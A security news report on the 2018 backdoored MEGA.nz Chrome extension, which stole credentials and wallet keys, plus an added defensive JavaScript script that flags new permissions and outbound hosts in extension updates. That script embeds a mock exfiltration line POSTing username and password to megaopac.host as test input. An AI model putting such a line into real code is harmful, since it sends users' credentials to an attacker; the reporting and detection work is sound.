The MEGA.nz Chrome Browser Extension Has Been Backdoored (UPDATE)
The MEGA.nz Chrome Extension has been identified as backdoored in its newest version. It steals credentials for several services, such as GitHub and Google, and sends them to an external website.
Starting with a thread on the /r/Monero subreddit, posted just about two hours before this was written, the MEGA.nz Chrome Browser Extension has been identified as backdoored in the newest version, 3.39.4. It steals credentials for several services, such as GitHub and Google, and sends them to an external website. Note: This story will be updated to keep you up to date.
Discovery
Reddit user gattacus updated the MEGA.nz extension in his browser, and the extension asked for additional permissions, which led him to analyze the changes in the source code. What he found was a backdoor trying to steal users' Monero. The fact that there was no recent commit on the public Git repository on GitHub could mean that MEGA's account on the Google Webstore for Chrome has been hacked, or that an authorized user (i.e. an insider) pushed the backdoored version to the store.
Affected Services
Shortly after, other researchers such as SerHack started investigating this incident, and their analysis revealed several other services being targeted by this backdoor.
Credentials currently known to be stolen:
- Amazon
- GitHub
- Microsoft
- MyMonero
- MyEtherWallet
- Aurora
The extension is not only going for login data, but also for wallet private keys.
If you are using the Firefox extension, you are currently not affected, as that extension is still on version 3.39.3.
The Attack Server
Collected credentials are sent to megaopac.host, a domain registered via Namecheap on 31.08.2018. The JavaScript code posts a request via XHR to that webserver. The parameter `d` probably contains an internal ID, where 3 stands for GitHub and so on. The `p1` parameter contains the username and `p2` holds the login password.
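The discovery above came from a user reading the source after an unexpected permission prompt, and the exfiltration is described as an XHR POST to a domain the extension had no business talking to. The following is an added example (not code from the article, from MEGA or from the researchers it cites) that mechanises both checks for an extension update: diff the permissions between the old and new manifest.json, and list outbound hosts that the new JavaScript bundle introduces and that are not the vendor's own. The manifests, the two bundle snippets and the trusted-domain list are constructed for this example; the snippet only mimics the shape the article describes (a POST to megaopac.host carrying `d`, `p1` and `p2`) and is not the real extension code.

```javascript
'use strict';
// Added example, not the article's or MEGA's code. Reviews an extension update
// by (1) diffing manifest permissions and (2) finding new outbound hosts in the
// shipped JavaScript. All inputs are constructed stand-ins, not real files.

// Constructed stand-in for the 3.39.3 manifest.
const OLD_MANIFEST = {
  manifest_version: 2, name: 'MEGA', version: '3.39.3',
  permissions: ['storage', 'unlimitedStorage', 'https://mega.nz/*'],
};
// Constructed stand-in for the 3.39.4 manifest: an update that would trigger
// the extra permission prompt the Reddit user saw.
const NEW_MANIFEST = {
  manifest_version: 2, name: 'MEGA', version: '3.39.4',
  permissions: ['storage', 'unlimitedStorage', 'https://mega.nz/*',
                'webRequest', '<all_urls>'],
};
// Constructed bundles: the old one only talks to the vendor, the new one adds
// an XHR POST shaped like the exfiltration described in the article.
const OLD_BUNDLE_JS = `
  fetch("https://mega.nz/api", { method: "POST", body: payload });
`;
const NEW_BUNDLE_JS = `
  fetch("https://mega.nz/api", { method: "POST", body: payload });
  var x = new XMLHttpRequest();
  x.open("POST", "https://megaopac.host/", true);
  x.send("d=3&p1=" + encodeURIComponent(user) + "&p2=" + encodeURIComponent(pass));
`;

// Permissions that appear or disappear between two manifests. In Manifest V2
// host permissions share the "permissions" array with API permissions.
function diffPermissions(oldManifest, newManifest) {
  const before = new Set(oldManifest.permissions || []);
  const after = new Set(newManifest.permissions || []);
  return {
    added: [...after].filter(p => !before.has(p)).sort(),
    removed: [...before].filter(p => !after.has(p)).sort(),
  };
}

// Hostnames of every quoted http(s) URL literal in a JavaScript source string.
// Literal matching is deliberately crude: concatenated or obfuscated URLs need
// a real parser or dynamic analysis, which this example does not attempt.
function extractHosts(js) {
  const hosts = new Set();
  const re = /["'`]https?:\/\/([^/"'`\s?#]+)/g;
  let m;
  while ((m = re.exec(js)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// True when hostname equals one of the trusted domains or is a subdomain of one.
// Suffix matching with the leading dot prevents "mega.nz.evil.example" passing.
function isTrustedHost(hostname, trustedDomains) {
  return trustedDomains.some(d => hostname === d || hostname.endsWith('.' + d));
}

// Outbound hosts that the new bundle introduces and that are not the vendor's.
// Anything listed here is a reason to read the surrounding code by hand.
function newOutboundHosts(oldJs, newJs, trustedDomains) {
  const known = new Set(extractHosts(oldJs));
  return extractHosts(newJs)
    .filter(h => !known.has(h))
    .filter(h => !isTrustedHost(h, trustedDomains));
}

// Full review of one update. The trusted-domain default is an assumption made
// for this example, not a list taken from MEGA.
function reviewUpdate(oldManifest, newManifest, oldJs, newJs,
                      trustedDomains = ['mega.nz', 'mega.co.nz']) {
  const perms = diffPermissions(oldManifest, newManifest);
  const hosts = newOutboundHosts(oldJs, newJs, trustedDomains);
  return {
    from: oldManifest.version, to: newManifest.version,
    addedPermissions: perms.added, removedPermissions: perms.removed,
    newOutboundHosts: hosts,
    // Either finding alone is worth holding the update for; both together is
    // the pattern this incident showed.
    verdict: (perms.added.length || hosts.length) ? 'REVIEW' : 'OK',
  };
}

// Stand-alone run: prints the review of the constructed 3.39.3 -> 3.39.4 update.
console.log(JSON.stringify(
  reviewUpdate(OLD_MANIFEST, NEW_MANIFEST, OLD_BUNDLE_JS, NEW_BUNDLE_JS), null, 2));
```

On real extensions the inputs would be the unpacked CRX directories of both versions (manifest.json plus the concatenated contents of every script listed in it); the host check is a first pass only and will miss URLs assembled at runtime, so a clean result is not a clean bill of health.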
Takeaway
This incident highlights the risk that third-party extensions and plugins pose to a robust security posture. It is not yet known whether MEGA's account has been compromised or whether rogue insiders are behind this backdoor. A lesson everyone can learn from this is to think twice about the permissions we grant an extension or anything similar; they often ask for far more than they actually need. Also, even though it remains unclear how the attacker backdoored the release, employees should be trained in best practices for company logins and shown how to identify phishing.
At the time of writing, this is everything that has been revealed. There has been no public statement from MEGA yet. Shoutout for the great work by the researchers involved, who were also mentioned above.
UPDATE 04.09.2018 19:32 GMT
The browser extension has been removed from the Google Webstore.
Update 05.09.2018 15:55 GMT
MEGA released a statement on their blog. They confirmed the information released by the researchers and are actively investigating the compromise of their Google Webstore account. Additionally, they gave an insight into why the attacker was able to push code as a release on the store: Google no longer allows publisher signatures on Chrome extensions, which removed an important countermeasure for making sure the code in fact comes from an authorized party.